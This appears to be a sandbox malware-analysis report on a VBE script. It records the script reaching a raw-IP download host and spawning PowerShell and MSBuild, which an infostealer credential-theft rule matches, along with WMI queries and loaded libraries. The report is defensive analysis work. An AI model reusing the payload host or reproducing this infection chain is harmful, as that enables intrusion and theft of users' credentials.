                  Source: wscript.exe, 00000000.00000003.2066723786.000002C0EB232000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067050019.000002C0EB232000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053497527.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067149458.000002C0EB235000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053348477.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2068007859.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056025031.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053788458.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/2412/r4
                  Source: wscript.exe, 00000000.00000003.2066723786.000002C0EB232000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067050019.000002C0EB232000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067149458.000002C0EB235000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2068007859.000002C0EB238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/2412/regOwiR4EFZZGKetHoUY.txtshqos.dll
                  Source: wscript.exe, 00000000.00000003.2053497527.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053348477.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056025031.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053788458.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/2412/vJA
                  Source: wscript.exe, 00000000.00000003.2065837487.000002C0EB286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.5K
                  Source: MSBuild.exe, 00000005.00000002.3309367586.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: MSBuild.exe, 00000005.00000002.3306974664.0000000000D92000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: MSBuild.exe, 00000005.00000002.3309367586.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.3306974664.0000000000D92000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: MSBuild.exe, 00000005.00000002.3309367586.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: MSBuild.exe, 00000005.00000002.3309367586.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                  Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49705 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: amsi64_5244.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: 5.2.MSBuild.exe.d90000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0156A9785_2_0156A978
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0156DBE05_2_0156DBE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01564AA05_2_01564AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01563E885_2_01563E88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_015641D05_2_015641D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0156E0ED5_2_0156E0ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_068B45C05_2_068B45C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_068B5D505_2_068B5D50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_068B35605_2_068B3560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_068B92975_2_068B9297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_068B03085_2_068B0308
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_068BE0D95_2_068BE0D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_068BA1505_2_068BA150
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_068B56705_2_068B5670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_068B3CC05_2_068B3CC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_068BC3705_2_068BC370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_06A0A1985_2_06A0A198
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0156DF885_2_0156DF88
                  Source: amsi64_5244.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 5.2.MSBuild.exe.d90000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winVBE@9/12@1/3
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\uaDoJtHubxengYS.vbsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1164:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-399786117
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mk50qoaj.oh4.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\uaDoJtHubxengYS.vbs"
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0969686.vbe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\uaDoJtHubxengYS.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5244" "2828" "2700" "2832" "0" "0" "2836" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5244" "2828" "2700" "2832" "0" "0" "2836" "0" "0" "0" "0" "0" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
